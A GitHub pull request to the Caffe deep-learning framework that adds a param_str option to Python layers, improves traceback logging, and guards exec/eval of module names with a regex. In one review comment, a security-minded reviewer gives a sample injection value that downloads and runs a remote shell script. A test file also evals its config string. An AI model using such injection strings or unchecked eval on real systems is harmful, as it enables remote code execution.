[Python] PythonLayer takes parameters by string and better exception handling #2001

Closed · wants to merge 5 commits
2 changes: 1 addition & 1 deletion Makefile
@@ -164,7 +164,7 @@ endif
LIBRARIES += glog gflags protobuf leveldb snappy \
lmdb boost_system hdf5_hl hdf5 m \
opencv_core opencv_highgui opencv_imgproc
PYTHON_LIBRARIES := boost_python python2.7
PYTHON_LIBRARIES := boost_python python2.7 boost_regex
WARNINGS := -Wall -Wno-sign-compare

##############################
1 change: 1 addition & 0 deletions Makefile.config.example
@@ -58,6 +58,7 @@ PYTHON_LIB := /usr/lib
# PYTHON_LIB := $(ANACONDA_HOME)/lib

# Uncomment to support layers written in Python (will link against Python libs)
# This requires an additional dependency, boost_regex, provided by Boost.
# WITH_PYTHON_LAYER := 1

# Whatever else you find you need goes here.
5 changes: 5 additions & 0 deletions cmake/Dependencies.cmake
@@ -131,6 +131,11 @@ if(BUILD_python)
add_definitions(-DWITH_PYTHON_LAYER)
include_directories(SYSTEM ${PYTHON_INCLUDE_DIRS} ${NUMPY_INCLUDE_DIR} ${Boost_INCLUDE_DIRS})
list(APPEND Caffe_LINKER_LIBS ${PYTHON_LIBRARIES} ${Boost_LIBRARIES})
find_package(Boost 1.46 COMPONENTS regex)
if (Boost_REGEX_FOUND)
include_directories(SYSTEM ${Boost_INCLUDE_DIRS})
list(APPEND Caffe_LINKER_LIBS ${Boost_LIBRARIES})
endif()
endif()
endif()
endif()
43 changes: 28 additions & 15 deletions include/caffe/python_layer.hpp
@@ -2,6 +2,8 @@
#define CAFFE_PYTHON_LAYER_HPP_

#include <boost/python.hpp>

#include <string>
#include <vector>

#include "caffe/layer.hpp"
@@ -10,29 +12,43 @@ namespace bp = boost::python;

namespace caffe {

#define PYTHON_LAYER_ERROR() { \
PyObject *petype, *pevalue, *petrace; \
PyErr_Fetch(&petype, &pevalue, &petrace); \
bp::object etype(bp::handle<>(bp::borrowed(petype))); \
bp::object evalue(bp::handle<>(bp::borrowed(bp::allow_null(pevalue)))); \
bp::object etrace(bp::handle<>(bp::borrowed(bp::allow_null(petrace)))); \
bp::object sio(bp::import("StringIO").attr("StringIO")()); \
bp::import("traceback").attr("print_exception")( \
etype, evalue, etrace, bp::object(), sio); \
LOG(INFO) << bp::extract<string>(sio.attr("getvalue")())(); \
PyErr_Restore(petype, pevalue, petrace); \
throw; \
}

template <typename Dtype>
class PythonLayer : public Layer<Dtype> {
public:
PythonLayer(PyObject* self, const LayerParameter& param)
: Layer<Dtype>(param), self_(self) { }
: Layer<Dtype>(param), self_(bp::handle<>(bp::borrowed(self))) { }

virtual void LayerSetUp(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top) {
try {
bp::call_method<bp::object>(self_, "setup", bottom, top);
self_.attr("param_str_") = bp::str(
this->layer_param_.python_param().param_str());
self_.attr("setup")(bottom, top);
} catch (bp::error_already_set) {
PyErr_Print();
throw;
PYTHON_LAYER_ERROR();
}
}

virtual void Reshape(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top) {
try {
bp::call_method<bp::object>(self_, "reshape", bottom, top);
self_.attr("reshape")(bottom, top);
} catch (bp::error_already_set) {
PyErr_Print();
throw;
PYTHON_LAYER_ERROR();
}
}

@@ -42,25 +58,22 @@ class PythonLayer : public Layer<Dtype> {
virtual void Forward_cpu(const vector<Blob<Dtype>*>& bottom,
const vector<Blob<Dtype>*>& top) {
try {
bp::call_method<bp::object>(self_, "forward", bottom, top);
self_.attr("forward")(bottom, top);
} catch (bp::error_already_set) {
PyErr_Print();
throw;
PYTHON_LAYER_ERROR();
}
}
virtual void Backward_cpu(const vector<Blob<Dtype>*>& top,
const vector<bool>& propagate_down, const vector<Blob<Dtype>*>& bottom) {
try {
bp::call_method<bp::object>(self_, "backward", top, propagate_down,
bottom);
self_.attr("backward")(top, propagate_down, bottom);
} catch (bp::error_already_set) {
PyErr_Print();
throw;
PYTHON_LAYER_ERROR();
}
}

private:
PyObject* self_;
bp::object self_;
};

} // namespace caffe
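To illustrate what the new PYTHON_LAYER_ERROR macro changes in practice, here is a minimal sketch (not part of this PR; the module and class name are hypothetical). Any exception the layer raises is now formatted with Python's traceback module on the C++ side and written to the Caffe log before being rethrown, instead of only being dumped to stderr by PyErr_Print().

import caffe


class FailingLayer(caffe.Layer):
    """Hypothetical layer used only to show the improved error reporting."""

    def setup(self, bottom, top):
        # With this PR, param_str_ is assigned before setup() is called, and
        # any exception raised here reaches PythonLayer::LayerSetUp, where
        # PYTHON_LAYER_ERROR() logs the full Python traceback via LOG(INFO)
        # and then rethrows the original C++ exception.
        raise ValueError('bad configuration, param_str_ was: %r'
                         % self.param_str_)

    def reshape(self, bottom, top):
        pass

    def forward(self, bottom, top):
        pass

    def backward(self, top, propagate_down, bottom):
        pass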
85 changes: 85 additions & 0 deletions python/caffe/test/test_python_layer_with_param_str.py
@@ -0,0 +1,85 @@
import unittest
import tempfile

import os

import caffe

class ElemwiseScalarLayer(caffe.Layer):
"""A layer that just multiplies by ten"""

def setup(self, bottom, top):
self.layer_params_ = eval(self.param_str_)
self.value_ = self.layer_params_['value']
if self.layer_params_['op'].lower() == 'add':
self._forward = self._forward_add
self._backward = self._backward_add
elif self.layer_params_['op'].lower() == 'mul':
self._forward = self._forward_mul
self._backward = self._backward_mul
else:
raise ValueError("Unknown operation type: '%s'"
% self.layer_params_['op'].lower())
def _forward_add(self, bottom, top):
top[0].data[...] = bottom[0].data + self.value_
def _backward_add(self, bottom, propagate_down, top):
bottom[0].diff[...] = top[0].diff
def _forward_mul(self, bottom, top):
top[0].data[...] = bottom[0].data * self.value_
def _backward_mul(self, bottom, propagate_down, top):
bottom[0].diff[...] = top[0].diff * self.value_
def reshape(self, bottom, top):
top[0].reshape(bottom[0].num, bottom[0].channels, bottom[0].height,
bottom[0].width)
def forward(self, bottom, top):
self._forward(bottom, top)
def backward(self, top, propagate_down, bottom):
self._backward(bottom, propagate_down, top)


def python_net_file():
f = tempfile.NamedTemporaryFile(delete=False)
f.write(r"""name: 'pythonnet' force_backward: true
input: 'data' input_dim: 10 input_dim: 9 input_dim: 8 input_dim: 7
layer { type: 'Python' name: 'one' bottom: 'data' top: 'one'
python_param {
module: 'test_python_layer_with_param_str' layer: 'ElemwiseScalarLayer'
param_str: "{'op': 'add', 'value': 2}" } }
layer { type: 'Python' name: 'two' bottom: 'one' top: 'two'
python_param {
module: 'test_python_layer_with_param_str' layer: 'ElemwiseScalarLayer'
param_str: "{'op': 'mul', 'value': 3}" } }
layer { type: 'Python' name: 'three' bottom: 'two' top: 'three'
python_param {
module: 'test_python_layer_with_param_str' layer: 'ElemwiseScalarLayer'
param_str: "{'op': 'add', 'value': 10}" } }""")
f.close()
return f.name

class TestLayerWithParam(unittest.TestCase):
def setUp(self):
net_file = python_net_file()
self.net = caffe.Net(net_file, caffe.TRAIN)
os.remove(net_file)

def test_forward(self):
x = 8
self.net.blobs['data'].data[...] = x
self.net.forward()
for y in self.net.blobs['three'].data.flat:
self.assertEqual(y, (x + 2) * 3 + 10)

def test_backward(self):
x = 7
self.net.blobs['three'].diff[...] = x
self.net.backward()
for y in self.net.blobs['data'].diff.flat:
self.assertEqual(y, 3 * x)

def test_reshape(self):
s = 4
self.net.blobs['data'].reshape(s, s, s, s)
self.net.forward()
for blob in self.net.blobs.itervalues():
for d in blob.data.shape:
self.assertEqual(s, d)
1 change: 1 addition & 0 deletions scripts/travis/travis_install.sh
@@ -15,6 +15,7 @@ apt-get install \
python-dev python-numpy \
libleveldb-dev libsnappy-dev libopencv-dev \
libboost-dev libboost-system-dev libboost-python-dev libboost-thread-dev \
libboost-regex-dev \
libprotobuf-dev protobuf-compiler \
libatlas-dev libatlas-base-dev \
libhdf5-serial-dev libgflags-dev libgoogle-glog-dev \
20 changes: 16 additions & 4 deletions src/caffe/layer_factory.cpp
@@ -6,6 +6,7 @@
#include "caffe/vision_layers.hpp"

#ifdef WITH_PYTHON_LAYER
#include <boost/regex.hpp>
#include "caffe/python_layer.hpp"
#endif

@@ -160,14 +161,25 @@ REGISTER_LAYER_CREATOR(TanH, GetTanHLayer);
#ifdef WITH_PYTHON_LAYER
template <typename Dtype>
shared_ptr<Layer<Dtype> > GetPythonLayer(const LayerParameter& param) {
string module_name = param.python_param().module();
string layer_name = param.python_param().layer();
// Check injection. This allows nested import.
boost::regex expression("[a-zA-Z_][a-zA-Z0-9_]*"
"(\\.[a-zA-Z_][a-zA-Z0-9_]*)*");
CHECK(boost::regex_match(module_name, expression))
<< "Module name is invalid: " << module_name;
CHECK(boost::regex_match(layer_name, expression))
<< "Layer name is invalid: " << layer_name;
Py_Initialize();
try {
bp::object module = bp::import(param.python_param().module().c_str());
bp::object layer = module.attr(param.python_param().layer().c_str())(param);
bp::object globals = bp::import("__main__").attr("__dict__");
bp::exec(("import " + module_name).c_str(), globals, globals);
bp::object layer_class = bp::eval((module_name + "." + layer_name).c_str(),
globals, globals);
bp::object layer = layer_class(param);
return bp::extract<shared_ptr<PythonLayer<Dtype> > >(layer)();
} catch (bp::error_already_set) {
PyErr_Print();
throw;
PYTHON_LAYER_ERROR();
}
}

Review comments on the bp::exec/bp::eval call above:

seanbell: Isn't it dangerous to call eval and exec on user strings that haven't been checked for commands? That is, we should first validate that module_name and layer_name both match the regex ^[a-zA-Z_][a-zA-Z0-9_]*$. Without this check, injection attacks like this one are possible:

python_param {
   ...
   module: 'os; os.system("wget example.com/malicious.sh"); os.system("bash malicious.sh")'
}

I understand that for most use cases, this isn't a concern, but I think it's good practice to avoid introducing unnecessary vulnerabilities.

Contributor: Agreed with @seanbell that if we're going to eval/exec, it's worth doing a check like the one he suggests. Is it necessary to switch away from bp::import, though? I'm not sure why it's needed; is it to load __dict__ first? Could param_str just be a string, and then Python layer writers could eval it as a dict on their own if they want it to take a dict?

Contributor: @tnarihi explains the use of eval/exec in one of the commit messages (tnarihi@64a2b04).

Contributor: Ah, thanks, missed that.

Author (tnarihi): Thanks for commenting. I also agree with @seanbell. Avoiding injections would be nice. I will modify it soon using Boost regex. Thanks for giving me the regex pattern, @seanbell! I will use this.

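To make the whitelist concrete, here is a quick Python illustration (not part of the PR) of what the pattern above accepts and rejects; is_valid_name is a hypothetical helper, and boost::regex_match already matches the whole string, which the \Z anchor emulates here.

import re

# Python equivalent of the boost::regex whitelist used in GetPythonLayer.
_NAME_RE = re.compile(r'[a-zA-Z_][a-zA-Z0-9_]*(\.[a-zA-Z_][a-zA-Z0-9_]*)*\Z')


def is_valid_name(name):
    return _NAME_RE.match(name) is not None


assert is_valid_name('test_python_layer_with_param_str')
assert is_valid_name('my_pkg.sub_module')   # dotted (nested) modules pass
assert not is_valid_name('os; os.system("wget example.com/malicious.sh")')
assert not is_valid_name('module.')         # trailing dot is rejected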
6 changes: 6 additions & 0 deletions src/caffe/proto/caffe.proto
@@ -664,6 +664,12 @@ message PowerParameter {
message PythonParameter {
optional string module = 1;
optional string layer = 2;
// This value is set to the `param_str_` attribute of your custom
// `PythonLayer` object in Python before the `setup()` method is called. It
// could be a number, a string, a dictionary in Python dict format, JSON,
// etc. You may parse this string in `setup` and use it in `forward` and
// `backward`.
optional string param_str = 3 [default = ''];
}

// Message that stores parameters used by ReLULayer
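As a usage sketch for param_str (not part of this PR; the layer name and fields are hypothetical), a layer's setup can parse the dict-formatted string with ast.literal_eval, which accepts only Python literals and so sidesteps the eval concerns raised in the review discussion above:

import ast

import caffe


class ScaleFromParamStrLayer(caffe.Layer):
    """Hypothetical layer that reads its scale factor from param_str."""

    def setup(self, bottom, top):
        # param_str_ arrives exactly as written in the prototxt, e.g.
        # "{'value': 3}". literal_eval parses literals only, so arbitrary
        # code embedded in the string cannot run.
        params = ast.literal_eval(self.param_str_) if self.param_str_ else {}
        self.scale = params.get('value', 1)

    def reshape(self, bottom, top):
        top[0].reshape(bottom[0].num, bottom[0].channels, bottom[0].height,
                       bottom[0].width)

    def forward(self, bottom, top):
        top[0].data[...] = bottom[0].data * self.scale

    def backward(self, top, propagate_down, bottom):
        bottom[0].diff[...] = top[0].diff * self.scale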